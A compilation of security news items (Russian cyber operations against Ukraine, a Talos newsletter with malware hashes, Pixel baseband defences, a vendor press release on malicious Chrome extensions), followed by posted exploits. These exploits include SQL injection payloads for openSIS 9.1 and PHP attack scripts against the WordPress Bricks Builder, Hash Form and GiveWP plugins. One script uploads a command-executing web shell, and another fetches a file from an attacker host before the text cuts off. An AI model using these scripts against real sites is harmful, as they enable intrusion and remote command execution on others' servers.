"Pig butchering," generative AI, and spear-phishing have all transformed digital warfare.

Source: Daniren vua Alamy Stock Photo

As the kinetic war between Russia and Ukraine persists, a parallel battle is being waged in cyberspace, where hackers are targeting critical infrastructure, government entities, and individual service personnel.

The cyber campaigns focus on espionage, disruption, and social engineering to weaken Ukrainian defenses and sow discord, with efforts to compromise personal data and infiltrate secure communication channels like Signal and Telegram.

Russian-aligned cyber actors, including advanced persistent threat (APT) groups like Gamaredon, have intensified their attacks since Russia's 2022 invasion of Ukraine.

Despite Ukrainian efforts to bolster cybersecurity, Russian hackers continue to refine their tools, and Russian cyber warfare tactics are varied and persistent, according to Ukraine's State Service of Special Communications and Information Protection (SSSCIP) September report.

These are just a few of the latest examples of cyberwarfare between the two states, though other additional malware perpetrators and cyberattack units, including Sandworm (aka APT44), continue to proliferate. 

**Messaging Apps Target Service Members**

One recent campaign involves the Russia-aligned UAC-0184 group targeting Ukrainian military personnel through messaging apps, including Signal. 

Hackers impersonate familiar contacts, sending malicious files disguised as combat footage or recruitment material to infect devices with malware.

Dan Black, manager, Mandiant Cyber Espionage Analysis, Google Cloud, says common technologies like smartphones and tablets have become essential tools for military personnel on the front lines, providing real-time intelligence and other critical support capabilities.

"But their utility cuts both ways," he cautions.

Because they provide such valuable capability, penetrating these devices can provide an adversary a surreptitious lens into various types of sensitive battlefield information that can have grave, even lethal, consequences for targets if compromised. 

Abu Qureshi, head of threat research for BforeAI, explains targeted cyberattacks aimed at military personnel through messaging apps can severely compromise operational security.

"By intercepting communications or distributing malware through trusted communication channels, attackers can extract sensitive data on the physical locations of personnel," Qureshi says. "This can lead to real-world consequences."

Malachi Walker, security adviser for DomainTools, adds a targeted cyberattack such as what’s being seen in the Russian/Ukrainian war is like pig-butchering attacks the team has observed in the financial service sector, where an attacker builds a personal relationship with their victim, gaining their trust over a period to gain a payout.

"Seeing this tactic used in warfare, rather than for financial gain, impacts the operational security of a military unit," Walker explains.

He says while a financially motivated pig-butchering attack can only leave one victim, using this technique in a war setting could place an entire group of soldiers in danger.

Adam Gavish, co-founder and CEO at DoControl, says what's particularly concerning is that many of these troops have access to sensitive intelligence and critical systems.

"A successful attack could potentially compromise not just individual soldiers, but entire military operations or strategies," he says.

The ripple effects of a single breach could harm many, making these personalized attacks especially dangerous.

"All of this can significantly impact combat effectiveness, readiness, and overall military capabilities," Gavish says.

**Russian-Speaking Users Targeted**

Meanwhile, the DCRat Trojan has been deployed through HTML smuggling, marking a shift in delivery methods to target Russian-speaking users. 

HTML smuggling techniques can bypass traditional security measures by nesting attacks within obfuscation layers like files, posing a significant threat to critical industries during conflicts.

Walker explains the use of HTML smuggling may not be the sole cause for change in the threat landscape, but it is indicative of an ongoing change that his team has observed in the past two years.

"The evolution of cyberattacks and malware, particularly those that have an intersection with the use of generative AI, have lowered the barrier for entry for threat actors, leading to more threats and a greater volume of attacks," he says.

DCRat and other similar malware can infiltrate systems controlling power grids, oil pipelines, and even nuclear facilities, which could severely disrupt the safety of any nation. "In the context of targeting Russian-speaking users and Russian companies, such attacks could have an impact that extends to other countries and companies and leads to further distrust," Walker adds.

He notes not all Russian companies are sanctioned by NATO-allied countries and those not sanctioned could be the most appealing targets as it would allow these threat actors to extend their reach.

These impacts can have a global impact including the delay of delivery for essential goods and the compromise of critical industries like energy, healthcare, financial services, and transportation.

Stephen Kowski, field chief technology officer (CTO) at SlashNext Email Security+, says this method of attack highlights the need for more sophisticated defense strategies that go beyond conventional antivirus solutions. 

"When looking at this phishing technique you need live analysis of malicious content within the file and that is why you cannot rely on signature-based, feeds-based phishing protection alone," he explains. 

He adds securing industrial control systems is paramount in preventing disruptions that could amplify physical attacks.

"A comprehensive approach involving regular security audits, network segmentation, and robust access controls can help safeguard energy infrastructure against supply chain attacks," Kowski says. 

**Game on for Gamaredon **

An ESET report released last month focused on the 2022 and 2023 campaigns of Gamaredon, one of the most active groups in Ukraine.

The group has been conducting spear-phishing campaigns and using custom malware to breach Ukrainian government institutions, with the attacks undergoing constant evolution — for example, shifting to PowerShell and VBScript-based attacks.

DoControl's Gavish says Gamaredon's persistent approach, while less stealthy, can be highly effective in overwhelming Ukraine's defenses through sheer volume. 

"This constant barrage of attacks ties up cybersecurity resources and increases the chances of a successful breach simply through persistence," he says. The real-world impact forces Ukraine to constantly divert resources to cyber defense. "Gamaredon's attempts to target NATO countries have significant implications for international cybersecurity cooperation," Gavish adds.

From his perspective, these types of threats highlight the need for increased information sharing and joint defense strategies among allied nations. "The situation in Ukraine serves as a stark reminder that cybersecurity is not just an IT issue — it's a matter of national security with very real-world consequences," Gavish says. 

**About the Author**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Ukraine-Russia Cyber Battles Tip Over Into the Real World

Despite what lessons we thought we learned from Colonial Pipeline, none of those lessons have been able to be put into practice.

Thursday, October 3, 2024 14:00

Government-run water systems and other critical infrastructure are still at risk from state-sponsored actors, according to a renewed warning from the U.S. Cybersecurity and Infrastructure Security Agency.  

CISA released an advisory last week on the matter of days after a small water treatment facility in Kansas was forced into manual operations after a cyber attack.  

I feel like this is just the latest in a string of warnings that we’ve been talking about since the Colonial Pipeline attack in 2021 that forced a gasoline shortage across the Eastern U.S. We’ve been discussing the importance of defending critical infrastructure for years now, so what’s new now? 

For starters, it seems like the frequency of these attacks seems to be on the rise. And many efforts to regulate cybersecurity policies and procedures in the industry have thus far fallen flat. 

The White House is reportedly working on rolling out a second wave of cybersecurity recommendations for water treatment facilities on the back of the attack in Kansas that affected the public water supply of 11,000 people. Although the cyber attack did not actually affect anyone from getting their water, it does raise the question of how much of an issue this could be if a state-sponsored actor were to target a facility in a town with a larger population, or if there weren’t backup plans in place to operate the facility manually.  

The U.S. Environmental Protection Agency (EPA) said last year that it had to pull a memo outlining cybersecurity standards at water treatment plants because of constant legal action from state and federal lawmakers and private water companies. And the American Water Works Association (a non-profit lobbying organization representing more than 50,000 members) has advocated for facilities and groups like the AWWA to write their own cybersecurity policies rather than relying on the U.S. government.  

All of that is to say, despite what lessons we thought we learned from Colonial Pipeline, none of those lessons have been able to be put into practice, and we’re still where we were with cybersecurity policies and regulations three years ago.  

Despite urging from the industry and some lawmakers, I’ve yet to see these groups write any of their own policies, so even if they have that power, they don’t seem to be taking advantage of it. So when CISA puts out this type of alert again in a few months after whatever future incident lies ahead, I would expect to see more action from all parties involved rather than another round of words warning that attacks can, and will, happen. 

**The one big thing **

Talos has recently observed an attack leading to the deployment of a MedusaLocker ransomware variant known as “BabyLockerKZ.” This actor has been active since at least late 2022 and targets organizations worldwide, although the number of victims was higher than average in EU countries until mid-2023 and, since then, in South American countries. We assess with medium confidence that the actor is financially motivated, likely working as an IAB or an affiliate of a ransomware cartel. 

**Why do I care? **

The actor behind these attacks seems to be particularly active, infecting more than 100 organizations per month, according to Talos telemetry. This reveals the professional and highly aggressive nature of the attacks and is coherent with the activity we would expect from an IAB or ransomware affiliate. As with any ransomware, BabyLockerKZ looks to encrypt targets’ files and lock them down until the target pays the request ransom.  

**So now what? **

Talos has released several new Snort rules and ClamAV signatures that detect the activity of this group and BabyLockerKZ. This group is also known to use several publicly available tools in their attacks, such as Mimikatz, which are well-known to the security community at this point. For more on living-off-the-land binaries (LoLBins) that attackers like this one are increasingly using, read our blog post here.  

**Top security headlines of the week **

**International law enforcement agencies worked together to arrest and unmask four individuals believed to be associated with the LockBit ransomware group.** As part of this campaign, investigators have also linked one of the LockBit members to Evil Corp, a Russian-backed cybercrime gang. At a press conference announcing the arrests, representatives from the U.K.’s National Crime Agency said that Evil Corp maintained a “privileged” relationship with the Russian government and was often asked to carry out targeted cyber attacks against NATO countries. LockBit is traditionally associated with financially motivated ransomware attacks targeting private companies, regardless of the country in which they reside. Europol, the U.K. NCA, the U.S. FBI and Japan’s National Police have also worked together to create and release a decryptor that can unlock files affected by the LockBit ransomware. The same agencies have been working since last year to target and seize assets and servers belonging to LockBit. The threat actor has taken credit for several major attacks over the past several years, including those targeting Boeing, Volkswagen, multiple major international ports and government-owned computers in Fulton County, Georgia. (Europol, TechCrunch) 

**The latest version of the U.S.’s National Institute of Standards and Technology’s password recommendations drop complexity in favor of length.** NIST’s latest version of its Password Guidelines removes the recommendations that passwords use a mixture of character types and that they be changed often. Instead, the draft states that credential service providers (CSPs) recommend users create passwords between 15 and 64 characters that may include ASCII or Unicode characters. The previous version of the NIST standards led many users to adopt easy-to-guess passwords such as “Password1234!” or store the complicated passwords in easy-to-access places, such as written down on a piece of paper near their computer. CSPs are also instructed to drop knowledge-based authentication or security questions when selecting passwords. NIST standards are important because they formalize principles widely adopted by the U.S. government and major technology companies like Microsoft and Google. The latest draft also states that users only need to change their passwords in the event of a publicly reported data breach. (Infosecurity Magazine, Dark Reading) 

**A vulnerability in a web app from car manufacturer Kia could allow an attacker to view a car’s license plate, unlock the doors, and even remotely start the ignition.** The since-patched vulnerability in Kia’s web portal could allow attackers to essentially build and deploy their own web app and reassign control of the internet-connected features of most modern Kia vehicles. The vulnerability could have allowed an adversary to immediately ping the location of a targeted vehicle, process its license plate number, and even honk the horn. This is the second such vulnerability the group of researchers has disclosed to a Hyundai-owned company in the past two years. The vulnerability highlights the risk that modern vehicles come with, many of which rely on internet connectivity for some of their features or interface with web apps, websites or mobile phone apps. A proof of concept from the researchers included a dashboard that could allow an attacker to type in a license plate number and then retrieve the owner’s personal information, eventually adding themselves as an “owner” of the car and executing commands on the vehicle. (Wired, Security Week) 

**Can’t get enough Talos? **

*   Resurgence of Spam: Cisco Talos Sound Alarm on New Tactics 
*   Critical RCE vulnerability found in OpenPLC 
*   Simple Mail Transfer Pirates: How threat actors are abusing third-party infrastructure to send spam 

**Upcoming events where you can find Talos**

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**it-sa Expo & Congress** **(Oct. 22 - 24)** 

_Nuremberg, Germany_

**White Hat Desert Con** **(Nov. 14)** 

_Doha, Qatar_

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 76491df69a26019139ac11117cd21bf5d0257a5ebd3d67837f558c8c9c3483d8   
**MD5:** b209df2951e29ab5eab4009579b10b8d  
**Typical Filename:** FileZilla\_3.67.1\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.76491DF69A-95.SBX.TG

**SHA 256:** c20fbc33680d745ec5ff7022c282a6fe969c6e6c7d77b7cfac34e6c19367cf9a   
**MD5:** 3bc6d86fc4b3262137d8d33713ed6082   
**Typical Filename:** 8c556f0a.dll   
**Claimed Product:** N/A   
**Detection Name:** Gen:Variant.Lazy.605353 

**SHA 256:** f0d7a2bb0c5db162332418747ba4987027b8a746b24c919a24235ff3b70d25e3   
**MD5:** 0d849044612667362bc88780baa1c1b7   
**Typical Filename:** CryptX.dll   
**Claimed Product:** N/A    
**Detection Name:** Gen:Variant.Lazy.605353 

**SHA 256:** 331fdf5f1f5679a6f6bb0baee8518058aba8081ef8f96e57fa3b74291fcbb814   
**MD5:** f23b90fc9bc301baf3e399e189b6d2dc   
**Typical Filename:** B.dll   
**Claimed Product:** N/A     
**Detection Name:** Gen:Variant.Lazy.605353

CISA is warning us (again) about the threat to critical infrastructure networks

Google has revealed the various security guardrails that have been incorporated into its latest Pixel devices to counter the rising threat posed by baseband security attacks.
The cellular baseband (i.e., modem) refers to a processor on the device that's responsible for handling all connectivity, such as LTE, 4G, and 5G, with a mobile phone cell tower or base station over a radio interface.
"This

Mobile Security / Technology

Google has revealed the various security guardrails that have been incorporated into its latest Pixel devices to counter the rising threat posed by baseband security attacks.

The cellular baseband (i.e., modem) refers to a processor on the device that's responsible for handling all connectivity, such as LTE, 4G, and 5G, with a mobile phone cell tower or base station over a radio interface.

"This function inherently involves processing external inputs, which may originate from untrusted sources," Sherk Chung and Stephan Chen from the Pixel team, and Roger Piqueras Jover and Ivan Lozano from the company's Android team said in a blog post shared with The Hacker News.

"For instance, malicious actors can employ false base stations to inject fabricated or manipulated network packets. In certain protocols like IMS (IP Multimedia Subsystem), this can be executed remotely from any global location using an IMS client."

What's more, the firmware powering the cellular baseband could also be vulnerable to bugs and errors that, if successfully exploited, could undermine the security of the device, particularly in scenarios where they lead to remote code execution.

In a Black Hat USA presentation last August, a team of Google security engineers described the modem as both a "fundamental" and "critical" smartphone component with access to sensitive data and one that's remote accessible with various radio technologies.

Threats to the baseband are not theoretical. In October 2023, research published by Amnesty International found that the Intellexa alliance behind Predator had developed a tool called Triton to exploit vulnerabilities in Exynos baseband software used in Samsung devices to deliver the mercenary spyware as part of highly targeted attacks.

The attack involves conducting a covert downgrade attack that forces the targeted device to connect to the legacy 2G network by means of a cell-site simulator, following which a 2G base station transceiver (BTS) is used to distribute the nefarious payload.

Google has since introduced a new security feature in Android 14 that allows IT administrators to turn off support for 2G cellular networks in their managed devices. It has also highlighted the role played by Clang sanitizers (IntSan and BoundSan) in hardening the security of the cellular baseband in Android.

Then earlier this year, the tech giant revealed it's working with ecosystem partners to add new ways of alerting Android users if their cellular network connection is unencrypted and if a bogus cellular base station or surveillance tool is recording their location using a device identifier.

The company has also outlined the steps it's taking to combat threat actors' use of cell-site simulators like Stingrays to inject SMS messages directly into Android phones, otherwise called SMS Blaster fraud.

"This method to inject messages entirely bypasses the carrier network, thus bypassing all the sophisticated network-based anti-spam and anti-fraud filters," Google noted in August. "SMS Blasters expose a fake LTE or 5G network which executes a single function: downgrading the user's connection to a legacy 2G protocol."

Some of the other defenses the company has added to its new Pixel 9 lineup include stack canaries, control-flow integrity (CFI), and auto-initialization of stack variables to zero to avoid leakage of sensitive data or act as an avenue to gain code execution.

"Stack canaries are like tripwires set up to ensure code executes in the expected order," it said. "If a hacker tries to exploit a vulnerability in the stack to change the flow of execution without being mindful of the canary, the canary "trips," alerting the system to a potential attack."

"Similar to stack canaries, CFI makes sure code execution is constrained along a limited number of paths. If an attacker tries to deviate from the allowed set of execution paths, CFI causes the modem to restart rather than take the unallowed execution path.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Android 14 Adds New Security Features to Block 2G Exploits and Baseband Attacks

Singapore, Singapore, 3rd October 2024, CyberNewsWire

**Singapore, Singapore, October 3rd, 2024, CyberNewsWire**

At DEF CON 32, the SquareX research team delivered a hard-hitting presentation titled Sneaky Extensions: The MV3 Escape Artists where they shared their findings on how malicious browser extensions are bypassing Google’s latest standard for building chrome extensions: Manifest V3 (MV3)’s security features, putting millions of users and businesses at risk.

SquareX’s research team publicly demonstrated rogue extensions built on MV3. The key findings include:

*   Extensions can steal live video streams, such as those from Google Meet and Zoom Web, without requiring special permissions.
*   The rogue extensions can act on a user’s behalf to add collaborators to private GitHub repositories.
*   The extensions are capable of hooking into login events to redirect users to a page disguised as a password manager login.
*   Extensions built on MV3 can steal site cookies, browsing history, bookmarks, and download history with ease, like their MV2 counterparts.
*   The rogue extensions can add pop-ups to the active webpage, such as fake software update prompts, tricking users into downloading malware.

Browser extensions have long been a target for malicious actors — a Stanford University report estimates that 280 million malicious Chrome extensions were installed in recent years. Google has struggled to address this issue, often relying on independent researchers to identify malicious extensions. In some cases, Google has had to manually remove them, such as the 32 extensions taken down in June last year. By the time they were removed, these extensions had already been installed 75 million times.

Most of these issues arose because the Chrome extension standard, Manifest Version 2 (MV2), was riddled with loopholes that granted extensions excessive permissions, and allowed scripts to be injected on the fly, often without users’ knowledge. This allowed malicious actors to easily exploit these vulnerabilities to steal data, inject malware, and access sensitive information. MV3 was introduced to address these problems by tightening security, limiting permissions, and requiring extensions to declare their scripts beforehand. 

However, SquareX’s research shows that MV3 falls short in many critical areas, demonstrating how attackers are still able to exploit minimal permissions to carry out malicious activity. Both individual users and enterprises are exposed, even under the newer MV3 framework.

Today’s security solutions, such as endpoint security, SASE/SSE, and Secure Web Gateways (SWG), lack visibility into installed browser extensions. There is currently no mature tool or platform capable of dynamically instrumenting these extensions, leaving enterprises without the ability to accurately assess whether an extension is safe or malicious. 

SquareX is committed to the highest level of cybersecurity protection for enterprises and has built key innovative features to solve this problem, which include;

*   Fine grained policies to decide which extensions to allow / block and parameters include extension permissions, creation date, last update, reviews, ratings, user count, author attributes etc
*   SquareX blocks network requests sent by extensions at run time – based on policies, heuristics and machine learning insights
*   SquareX is also experimenting with dynamic analysis of Chrome Extensions using a modified Chromium browser in its cloud server

These are part of SquareX’s Browser Detection and Response solution which is being deployed at medium-large enterprises and is effectively blocking these attacks.

> **Vivek Ramachandran****, Founder & CEO of** **SquareX**, warned about the mounting risks: “Browser extensions are a blind spot for EDR/XDR and SWGs have no way to infer their presence. This has made browser extensions a very effective and potent technique to silently be installed and monitor enterprise users, and attackers are leveraging them to monitor communication over web calls, act on the victim’s behalf to give permissions to external parties, steal cookies and other site data and so on.” “Our research proves that without dynamic analysis and the ability for enterprises to apply stringent policies, it will not be possible to identify and block these attacks. Google MV3, though well intended, is still far away from enforcing security at both a design and implementation phase,” said Vivek Ramachandran.

**About SquareX**

SquareX helps organizations detect, mitigate and threat-hunt client-side web attacks happening against their users in real time.

SquareX’s industry-first Browser Detection and Response (BDR) solution, takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware, malicious extensions and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

With SquareX, enterprises can also provide contractors and remote workers with secure access to internal applications, enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions.

**Contact**

**Head of PR**  
**Junice Liew**  
**SquareX**  
**\[email protected\]**

Millions of Enterprises at Risk: SquareX Shows How Malicious Extensions Bypass Google’s MV3 Restrictions

openSIS version 9.1 suffers from a remote SQL injection vulnerability.

    # Exploit Title: openSIS 9.1 - SQLi (Authenticated)# Google Dork: intext:"openSIS is a product"# Date: 09.09.2024# Exploit Author: Devrim Dıragumandan (d0ub1edd)# Vendor Homepage: https://www.os4ed.com/# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1# Version: 9.1# Tested on: LinuxA SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1---    Parameter: X-Forwarded-For #1* ((custom) HEADER)    Type: boolean-based blind    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae--- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

openSIS 9.1 SQL Injection

WordPress Bricks Builder Theme version 1.9.6 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : WordPress Bricks Builder Theme 1.9.6 php code injection Vulnerability                                                       |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://bricksbuilder.io/                                                                                                   |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 53 set your target.

[+] Line 45 set your commands.

[+] Line 68 set your path.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class MetasploitModule {

    private $info; // معلومات الوحدة  
    private $targetUri; // URI المستهدف

    // دالة لجلب الـ Nonce  
    private function fetchNonce() {  
        // تحقق مما إذا كانت targetUri مُعرفة  
        if (empty($this->targetUri['path'])) {  
            throw new Exception('Target URI path is not set.');  
        }

        // إرسال طلب GET لجلب الـ Nonce  
        $response = $this->sendRequest(['method' => 'GET', 'uri' => $this->targetUri['path']]);  
        // إذا كانت الاستجابة غير ناجحة، نرجع null  
        if ($response['code'] !== 200) return null;

        // استخدام التعبير النمطي لاستخراج الـ Nonce  
        preg_match('/"nonce":"([a-f0-9]+)"/', $response['body'], $matches);  
        return $matches ? $matches[1] : null; // إرجاع الـ Nonce أو null إذا لم يتم العثور عليه  
    }

    // دالة تنفيذ الاستغلال  
    public function exploit() {  
        // جلب الـ Nonce  
        $nonce = $this->fetchNonce();  
        if (!$nonce) {  
            throw new Exception('Failed to retrieve nonce. Exiting...'); // إذا فشل جلب الـ Nonce  
        }

        echo "Nonce retrieved: {$nonce}\n"; // طباعة الـ Nonce المستخرج

        // إعداد البيانات لإرسالها في الطلب  
        $data = [  
            'postId' => rand(1, 10000), // توليد معرف عشوائي  
            'nonce' => $nonce, // استخدام الـ Nonce المستخرج  
            'element' => [  
                'name' => 'code',  
                'settings' => [  
                    'executeCode' => 'true',  
                    'code' => "<?php payload ?>" // هنا يتم وضع الشيفرة التي سيتم تنفيذها  
                ]  
            ]  
        ];

        // إرسال الطلب POST لتنفيذ الاستغلال  
        $this->sendRequest([  
            'method' => 'POST',  
            'uri' => $this->targetUri['path'] . '/index.php', // URL المستهدف  
            'ctype' => 'application/json', // نوع المحتوى  
            'data' => json_encode($data), // تحويل البيانات إلى صيغة JSON  
            'vars_get' => ['rest_route' => '/bricks/v1/render_element'] // المعلمات الإضافية  
        ]);  
    }

    // دالة لمحاكاة الطلبات HTTP  
    private function sendRequest($options) {  
        // قم بتنفيذ منطق الطلب HTTP هنا  
        return ['code' => 200, 'body' => '{"nonce":"123456"}']; // استجابة مثال، يجب استبدالها بالمنطق الفعلي  
    }  
}

// الاستخدام  
$targetUri = ['path' => '/path/to/target']; // تعيين مسار الهدف هنا  
$module = new MetasploitModule([], $targetUri); // تمرير targetUri عند إنشاء الكائن  
try {  
    $module->exploit(); // محاولة تنفيذ الاستغلال  
} catch (Exception $e) {  
    echo $e->getMessage(); // طباعة رسالة الخطأ إذا حدثت  
}

?>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

WordPress Bricks Builder Theme 1.9.6 Code Injection

WordPress Hash Form plugin version 1.1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : WordPress Hash Form 1.1.0 php code injection Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://plugintests.com/plugins/wporg/hash-form/latest                                                                      |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 117 set your target.

[+] Line 111 set your commands.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class WordPressHashFormRCE {  
    private $target_url;  
    private $nonce;

    public function __construct($target_url) {  
        $this->target_url = $target_url;  
    }

    public function check() {  
        if (!$this->isWordPressOnline()) {  
            return 'WordPress does not appear to be online.';  
        }

        $plugin_version = $this->checkPluginVersion('hash-form', '1.1.1');

        if ($plugin_version === null) {  
            return 'Hash Form plugin does not appear to be installed.';  
        }

        if ($plugin_version === false) {  
            return 'Hash Form plugin is installed but the version is unknown.';  
        }

        if ($plugin_version !== '1.1.0') {  
            return "Hash Form plugin is version: $plugin_version, which is not vulnerable.";  
        }

        return "Detected Hash Form plugin version: $plugin_version";  
    }

    public function exploit() {  
        echo "Attempting to retrieve nonce from the target...\n";  
        $this->nonce = $this->getNonce();

        if (!$this->nonce) {  
            die('Failed to retrieve the nonce necessary for file upload.');  
        }

        echo "Nonce retrieved: {$this->nonce}\n";  
        echo "Uploading PHP payload using the retrieved nonce...\n";

        $file_url = $this->uploadPhpFile();  
        if (!$file_url) {  
            die('Failed to upload the PHP payload. Check file permissions and server settings.');  
        }

        echo "PHP payload uploaded successfully to $file_url\n";  
        $this->triggerPayload($file_url);  
    }

    private function isWordPressOnline() {  
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
        return $response !== false;  
    }

    private function checkPluginVersion($plugin_name, $version) {  
        $response = $this->sendRequest('GET', "/wp-admin/admin-ajax.php?action=hashform_preview&form=1");  
        if ($response === false) return null;

        preg_match('/"version":"([^"]+)"/', $response, $matches);  
        return $matches[1] ?? false;  // return the version or false if not found  
    }

    private function getNonce() {  
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
        if ($response === false) return null;

        preg_match('/"ajax_nounce":"([a-f0-9]+)"/', $response, $matches);  
        return $matches[1] ?? null;  
    }

    private function uploadPhpFile() {  
        $file_content = $this->createPayload();  
        $file_name = strtolower(bin2hex(random_bytes(4))) . '.php';

        $response = $this->sendRequest('POST', '/wp-admin/admin-ajax.php', [  
            'action' => 'hashform_file_upload_action',  
            'file_uploader_nonce' => $this->nonce,  
            'allowedExtensions[0]' => 'php',  
            'sizeLimit' => 1048576,  
            'qqfile' => $file_name,  
            'data' => $file_content  
        ]);

        $json_response = json_decode($response, true);  
        return $json_response['url'] ?? null;  
    }

    private function triggerPayload($url) {  
        echo "Triggering the payload...\n";  
        $this->sendRequest('GET', $url);  
    }

    private function sendRequest($method, $uri, $data = []) {  
        $url = $this->target_url . $uri;  
        $options = [  
            'http' => [  
                'header' => "Content-Type: application/x-www-form-urlencoded\r\n",  
                'method' => $method,  
                'content' => http_build_query($data),  
            ],  
        ];  
        $context = stream_context_create($options);  
        return @file_get_contents($url, false, $context);  
    }

    private function createPayload() {  
        // You can define your payload logic here, for now, we return a simple payload  
        $payload = "<?php\n if(isset(\$_GET['cmd'])) { system(\$_GET['cmd']); }\n ?>";  
        return base64_encode($payload);  
    }  
}

// استخدام الوحدة  
$target_url = 'http://target-wordpress-site.com';  
$exploit = new WordPressHashFormRCE($target_url);

// تحقق من الثغرة  
echo $exploit->check() . "\n";

// تنفيذ الاستغلال  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

WordPress Hash Form 1.1.0 Code Injection

WordPress GiveWP Donation Fundraising Platform version 3.14.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://givewp.com/                                                                                                         |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 78 set your file link.[+] Line 127. set your target.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass GiveWPExploit {    private $targetUrl;    private $headers;    public function __construct($targetUrl) {        $this->targetUrl = $targetUrl;        $this->headers = array(            'Content-Type: application/x-www-form-urlencoded'        );    }    public function check() {        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search'));        if (!$response || $response['http_code'] != 200) {            echo "Failed to retrieve form list.\n";            return false;        }        $forms = json_decode($response['body'], true);        if (empty($forms)) {            echo "No forms found.\n";            return false;        }        echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . "\n";        return $forms;    }    public function exploit() {        $forms = $this->check();        if (!$forms) {            return;        }        $selectedForm = $forms[array_rand($forms)];        $validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']);        if (!$validForm) {            echo "Failed to retrieve a valid form for exploitation.\n";            return;        }        echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation.\n";        $this->sendExploitRequest($validForm);    }    private function retrieveAndAnalyzeForm($formId) {        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array(            'action' => 'give_donation_form_nonce',            'give_form_id' => $formId        ));        if (!$response || $response['http_code'] != 200) {            return false;        }        $formData = json_decode($response['body'], true);        $giveFormId = $formId;        $giveFormHash = $formData['data'];        $givePriceId = '0'; // Default price ID        $giveAmount = '$10.00'; // Default amount        if (!$giveFormHash) {            return false;        }        return array(            'give_form_id' => $giveFormId,            'give_form_hash' => $giveFormHash,            'give_price_id' => $givePriceId,            'give_amount' => $giveAmount        );    }    private function sendExploitRequest($validForm) {        // URL of the malicious file to be fetched        $remoteFileUrl = 'http://attacker-server.com/malicious-file.php';        // Payload that uses file_get_contents to fetch the remote file        $payload = sprintf(            